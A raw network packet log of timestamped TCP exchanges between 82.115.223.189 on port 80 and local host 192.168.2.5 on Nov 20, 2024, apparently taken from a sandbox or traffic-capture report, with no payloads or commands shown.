                                          Nov 20, 2024 07:48:03.200310946 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.200321913 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.200345039 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.200376034 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.200387955 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.200414896 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.200448036 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.200463057 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.200480938 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.200512886 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.200521946 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.200550079 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.200592041 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.200592995 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.200644016 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.200694084 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.200700045 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.200726986 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.200759888 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.200776100 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.200794935 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.200828075 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.200849056 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.200860023 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.200892925 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.200907946 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.200926065 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.200958014 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.200968027 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.200992107 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.201025963 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.201037884 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.201080084 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.201112032 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.201133013 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.201167107 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.201211929 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.201215029 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.201250076 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.201282024 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.201293945 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.201316118 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.201349020 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.201363087 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.201383114 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.201416016 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.201426029 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.201448917 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.201481104 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.201488972 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.201514959 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.201551914 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.201561928 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.201585054 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.201617002 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.201623917 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.201651096 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.201683044 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.201692104 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.201719046 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.201750994 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.201761007 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.201783895 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.201816082 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.201827049 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.201849937 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.201881886 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.201894045 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.201915026 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.201947927 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.201963902 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.201978922 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.202009916 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.202027082 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.202044964 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.202076912 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.202092886 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.202110052 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.202116013 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.202142954 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.202176094 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.202176094 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.202209949 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.202228069 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.202245951 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.202277899 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.202301025 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.202311993 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.202343941 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.202364922 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.202377081 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.202410936 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.202430964 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.202444077 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.202476025 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.202503920 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.202508926 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.202542067 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.202574015 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.202574968 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.202605963 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.202619076 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.202639103 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.202671051 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.202689886 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.202704906 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.202735901 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.202752113 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.202768087 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.202802896 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.202817917 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.202836990 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.202871084 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.202894926 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.204122066 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.226793051 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.226921082 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.240999937 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.241053104 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.241086960 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.241108894 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.241122007 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.241143942 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.241156101 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.241189957 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.241211891 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.241225004 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.241278887 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.289668083 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.289721966 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.289756060 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.289804935 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.289840937 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.289846897 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.289870977 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.289901018 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.289952993 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.289959908 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.290003061 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.290036917 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.290069103 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.290069103 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.290122986 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.290122986 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.290155888 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.290189981 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.290210962 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.290221930 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.290255070 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.290275097 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.290287018 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.290338039 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.290339947 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.290373087 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.290406942 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.290441036 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.290448904 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.290491104 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.290493011 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.290524006 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.290584087 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.290604115 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.290616035 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.290648937 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.290669918 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.290677071 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.290710926 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.290730953 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.290760040 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.290791035 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.290818930 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.290829897 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.290860891 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.290874958 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.290894985 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.290945053 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.290945053 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.290996075 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.291049004 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.291083097 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.291085005 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.291115046 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.291131020 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.291147947 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.291179895 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.291199923 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.291214943 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.291245937 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.291270018 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.291280985 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.291331053 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.291354895 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.291390896 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.291440964 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.291450977 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.291476011 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.291507959 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.291544914 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.291554928 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.291577101 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.291610003 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.291610956 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.291645050 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.291656017 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.291680098 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.291712046 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.291737080 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.291760921 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.291793108 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.291811943 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.291826963 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.291860104 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.291882992 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.291894913 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.291927099 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.291960001 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.291968107 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.291991949 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.292026043 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.292027950 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.292061090 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.292079926 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.292093992 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.292125940 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.292145014 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.292160034 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.292191982 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.292207003 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.292226076 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.292254925 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.292270899 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.292288065 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.292321920 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.292332888 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.292356968 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.292391062 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.292406082 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.292423964 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.292457104 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.292469025 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.292490005 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.292521954 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.292538881 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.292553902 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.292586088 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.292601109 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.292619944 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.292654037 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.292663097 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.292681932 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.292712927 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.292721033 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.292747021 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.292778015 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.292785883 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.292813063 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.292844057 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.292856932 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.292876959 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.292912006 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.292924881 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.292946100 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.292978048 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.293010950 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.293010950 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.293045044 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.293060064 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.293077946 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.293111086 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.293123960 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.293144941 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.293179989 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.293190956 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.293214083 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.293245077 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.293261051 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.293278933 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.293309927 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.293323040 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.293344021 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.293375969 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.293390036 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.293409109 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.293441057 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.293459892 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.293459892 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.293473005 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.293509960 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.293529034 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.295135021 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.331656933 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.331713915 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.331724882 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.331748009 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.331779957 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.331799030 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.331813097 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.331846952 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.331871986 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.331883907 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.331912994 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.331940889 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.375777960 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.380036116 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.380069971 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.380105019 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.380177021 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.380311966 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.380362988 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.380383968 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.380398989 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.380430937 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.380465031 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.380465031 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.380517006 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.380518913 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.380553007 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.380585909 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.380620003 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.380631924 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.380651951 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.380666018 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.380687952 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.380714893 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.380748987 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.380759001 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.380800009 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.380805016 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.380852938 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.380887032 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.380904913 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.380919933 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.380953074 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.380969048 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.381006002 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.381040096 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.381052017 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.381088972 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.381125927 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.381156921 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.381176949 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.381227016 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.381227970 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.381263018 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.381297112 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.381325960 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.381346941 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.381378889 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.381390095 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.381412029 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.381443977 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.381457090 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.381478071 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.381510019 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.381545067 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.381546974 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.381578922 CET804970482.115.223.189192.168.2.5
